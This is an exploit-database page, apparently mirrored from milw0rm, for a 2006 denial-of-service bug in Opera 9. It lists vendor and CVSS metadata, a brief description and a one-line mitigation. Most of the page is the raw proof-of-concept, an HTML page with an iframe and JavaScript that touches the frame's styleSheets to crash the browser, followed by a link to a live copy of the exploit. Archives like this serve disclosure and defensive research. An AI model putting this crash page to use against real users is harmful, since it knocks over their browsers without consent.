header-logo
Suggest Exploit
vendor:
Opera
by:
Ahmad Muammar W.K
7,5
CVSS
HIGH
Denial of Service (DoS)
20
CWE
Product Name: Opera
Affected Version From: Opera 9
Affected Version To: Opera 9
Patch Exists: YES
Related CWE: N/A
CPE: a:opera_software:opera
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All
2006

Opera 9 DOS exploit

This exploit is a Denial of Service (DoS) vulnerability in Opera 9. It was discovered by Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id). The exploit uses an iframe with a malicious JavaScript code to cause the browser to crash. The malicious code is triggered when the browser attempts to access the iframe's styleSheets property.

Mitigation:

Users should update to the latest version of Opera 9 to mitigate this vulnerability.
Source

Exploit-DB raw data:

<!-- Opera 9 DOS exploit, discovered by 
     Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id) 
     http://y3d1ps.blogspot.com
//-->

<html>
<iframe src="palsu.php" name="fake"  ></iframe> 
<script type="text/javascript">
function mystyle() {
    if (fake.document.styleSheets.length == 1 ) 
	{
      f = document.forms["basicstyle"].elements;
      for (j = 0; j < f.length; j++) 
	  	{
       	if (f[j].name == 'fsmain');
      	}  
      }

 }
mystyle();
</script>
</html>

<!-- live exploit :
     http://y3dips.echo.or.id/opera9-dos/
//-->

# milw0rm.com [2006-07-01]

Navigation

Suggest Exploit

Services By CQR